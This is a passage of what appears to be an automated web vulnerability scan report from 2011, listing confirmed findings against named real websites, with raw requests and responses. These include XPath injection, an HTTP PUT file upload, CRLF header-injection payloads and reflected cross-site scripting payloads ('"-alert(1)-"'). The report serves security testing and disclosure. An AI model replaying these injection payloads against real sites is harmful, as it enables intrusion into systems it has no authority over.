Date: Sat, 02 Apr 2011 12:44:13 GMT
Server: Apache
Set-Cookie: flsid=899145ae9fb41c146ae6e41bb855b653; path=/
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 31 Mar 2011 05:45:51 GMT
Set-Cookie: fl-uid=03f6276b0fa2982d890f0193e189b615%2C1%2C1301748253; expires=Sun, 01-Apr-2012 12:44:13 GMT; path=/; domain=.thefind.com
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 78472
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>TheFind - Shopped &amp; Found</title>


<script type="text/javascri
...[SNIP]...
<script type="text/javascript" src="//cdn.thefind.com/scripts/main/utils-initjquery-elation-browser-tracking-panel-ajaxlib-events-ui-msie~xpath/tplmgr-tplmgr/ui-infobox/user-user/marketing-bigpicture/jquery-suggest/search-suggest-input-search">
...[SNIP]...

3.4. http://www.wwe.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wwe.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wwe.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.2.17
Last-Modified: Fri, 01 Apr 2011 16:47:30 +0000
Vary: Cookie
ETag: "1301676450"
X-App: p5tyr3
Content-Type: text/html; charset=utf-8
X-Varnish: 1587144406 1587143361
X-CacheTyr-Server: p5tyr3
X-CacheTyr: HIT
X-CacheTyr-Hits: 1
X-Cacheable: NO: beresp.status 1
X-Cacheable-status: 404
Content-Length: 53517
X-Varnish: 979578143 959694108
X-CacheKyte-Server: p5kyte7
X-CacheKyte: HIT
X-CacheKyte-Hits: 1002095
Vary: Accept-Encoding
Cache-Control: public, must-revalidate, max-age=11294
Date: Sat, 02 Apr 2011 13:39:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...

jQuery.extend(Drupal.settings, {"basePath":"\/","automodal":{".automodal":{"autoFit":false,"draggable":true,"width":2000,"height":2000,"automodalClose":true,"automodalReload":false}},"jcarousel":{"ajaxPath":"\/jcarousel\/ajax\/views"},"twitter_enabled":true,"getQ":"node\/16810560","views":{"ajax_path":"\/views\/ajax","ajaxViews":[{"view_name":"promo_pod","view_display_id":"block_1","view_args":"","view_
...[SNIP]...

4. HTTP PUT enabled  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://activresa-secure2.icor.fr
Path:   /

Issue detail

HTTP PUT is enabled on the web server. The file /9a847644e2391b55.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Request 1

PUT /9a847644e2391b55.txt HTTP/1.0
Host: activresa-secure2.icor.fr
Content-Length: 16

facafbdd945895ba

Response 1

HTTP/1.1 201 Created
Connection: close
Date: Sat, 02 Apr 2011 12:48:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://activresa-secure2.icor.fr/9a847644e2391b55.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /9a847644e2391b55.txt HTTP/1.0
Host: activresa-secure2.icor.fr

Response 2

HTTP/1.1 200 OK
Cache-Control: max-age=60
Content-Length: 16
Content-Type: text/plain
Last-Modified: Sat, 02 Apr 2011 12:48:23 GMT
Accept-Ranges: bytes
ETag: W/"5222c64034f1cb1:3765"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:48:23 GMT
Connection: close

facafbdd945895ba

5. HTTP header injection  previous  next
There are 15 instances of this issue:


5.1. http://www.ew.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ew.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7805c%0d%0aa049615f928 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7805c%0d%0aa049615f928 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ew.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:32:14 GMT
Location: http://www.ew.com/ew/7805c
a049615f928

Vary: Accept-Encoding
Content-Length: 307
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.ew.com/ew/78
...[SNIP]...

5.2. http://www.familyeducation.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.familyeducation.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2afbc%0d%0a10ac4b7e696 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /favicon.ico2afbc%0d%0a10ac4b7e696 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.familyeducation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Redirect
Server: Microsoft-IIS/5.0
Date: Sat, 02 Apr 2011 13:57:17 GMT
Location: /defaultpage.htm?/favicon.ico2afbc
10ac4b7e696



5.3. http://www.health.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.health.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a5cc2%0d%0a808e9ba22de was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a5cc2%0d%0a808e9ba22de HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.health.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:35:15 GMT
Location: http://www.health.com/health/a5cc2
808e9ba22de

Vary: Accept-Encoding
Content-Length: 319
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.health.com/h
...[SNIP]...

5.4. http://www.homestead.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.homestead.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a31ef%0d%0ac36e0392523 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a31ef%0d%0ac36e0392523 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homestead.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Sat, 02 Apr 2011 13:35:09 GMT
Location: /a31ef
c36e0392523
/


5.5. http://www.instyle.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instyle.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b65da%0d%0aa9cfd0405fc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b65da%0d%0aa9cfd0405fc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.instyle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 14:04:58 GMT
Location: http://www.instyle.com/instyle/b65da
a9cfd0405fc

Vary: Accept-Encoding
Content-Length: 322
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.instyle.com/
...[SNIP]...

5.6. http://www.livingsocial.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livingsocial.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a8e30%0d%0ab8e0c5a066b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a8e30%0d%0ab8e0c5a066b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.livingsocial.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 02 Apr 2011 13:38:58 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: http://livingsocial.com/a8e30
b8e0c5a066b


<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

5.7. http://www.people.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.people.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fade4%0d%0a04e193106f1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fade4%0d%0a04e193106f1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.people.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 12:43:26 GMT
Location: http://www.people.com/people/fade4
04e193106f1

Vary: Accept-Encoding
Content-Length: 319
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.people.com/p
...[SNIP]...

5.8. http://www.peoplestylewatch.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.peoplestylewatch.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 894db%0d%0ab895b7fee0e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /894db%0d%0ab895b7fee0e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.peoplestylewatch.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:56:32 GMT
Location: http://www.people.com/894db
b895b7fee0e

Vary: Accept-Encoding
Content-Length: 322
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.people.com/8
...[SNIP]...

5.9. http://www.salesforce.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7f0d3%0d%0a3d52478bda4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7f0d3%0d%0a3d52478bda4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.salesforce.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /7f0d3
3d52478bda4
/
Date: Sat, 02 Apr 2011 13:46:30 GMT
Content-Length: 77

The URL has moved to <a href="/7f0d3
3d52478bda4/">/7f0d3
3d52478bda4/</a>

5.10. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shop.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload e81a0%0d%0a052c3a9c4af was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /favicon.ico?e81a0%0d%0a052c3a9c4af=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 13:41:32 GMT
Content-Type: text/html
Content-Length: 301
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?e81a0
052c3a9c4af
=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?e81a0
052c3a9c4af=1">
</head>
<body><h1>Object Moved</h1>This document may be found <a href=
...[SNIP]...

5.11. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopcompanion.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 3f544%0d%0a18f859d78f2 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /favicon.ico?3f544%0d%0a18f859d78f2=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shopcompanion.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 14:00:40 GMT
Content-Type: text/html
Content-Length: 301
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?3f544
18f859d78f2
=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?3f544
18f859d78f2=1">
</head>
<body><h1>Object Moved</h1>This document may be found <a href=
...[SNIP]...

5.12. http://www.tbo.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tbo.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fefb7%0d%0ad3916ee3b78 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fefb7%0d%0ad3916ee3b78 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tbo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.6.32
Date: Sat, 02 Apr 2011 13:59:19 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: http://www2.tbo.com/fefb7
d3916ee3b78

Server-Name: media2

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/0.6.32</center>
</body>
</html>

5.13. http://www.thisoldhouse.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thisoldhouse.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ff592%0d%0afdec1d1094 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ff592%0d%0afdec1d1094 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thisoldhouse.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 14:13:11 GMT
Location: http://www.thisoldhouse.com/toh/ff592
fdec1d1094

Vary: Accept-Encoding
Content-Length: 327
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.thisoldhouse
...[SNIP]...

5.14. http://www.wn.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wn.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload aa6b8%0d%0a651e1e31954 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /aa6b8%0d%0a651e1e31954 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:39:56 GMT
Server: Apache/2.2.16 (Debian)
Location: http://wn.com/aa6b8
651e1e31954

Vary: Accept-Encoding
Content-Length: 316
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://wn.com/aa6b8
65
...[SNIP]...

5.15. http://www.youravon.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.youravon.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3419d%0d%0a6094b152882 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3419d%0d%0a6094b152882 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.youravon.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: IBM_HTTP_Server
Location: http://3419d
6094b152882
.avonrepresentative.com/
Content-Length: 301
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://3419d
6094b152882.avonrepresentative.co
...[SNIP]...

6. Cross-site scripting (reflected)  previous  next
There are 122 instances of this issue:


6.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b0fb"-alert(1)-"131e368384f was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=1b0fb"-alert(1)-"131e368384f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7224
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:00:26 GMT
Expires: Sat, 02 Apr 2011 13:00:26 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
XBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=1b0fb"-alert(1)-"131e368384fhttp://www.webex.com/lpintl/us/banner/next-meeting-together.html?TrackID=1024434");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess =
...[SNIP]...

6.2. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61763"-alert(1)-"fd5b291024e was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ61763"-alert(1)-"fd5b291024e&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 12:57:47 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 12:57:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7244

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
HN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ61763"-alert(1)-"fd5b291024e&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/lets-get-together.html%3FTrackID%3D1024433");
var fscUrl = url;
var fscU
...[SNIP]...

6.3. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20aba"-alert(1)-"6d10011bb3f was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-406387893378091220aba"-alert(1)-"6d10011bb3f&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
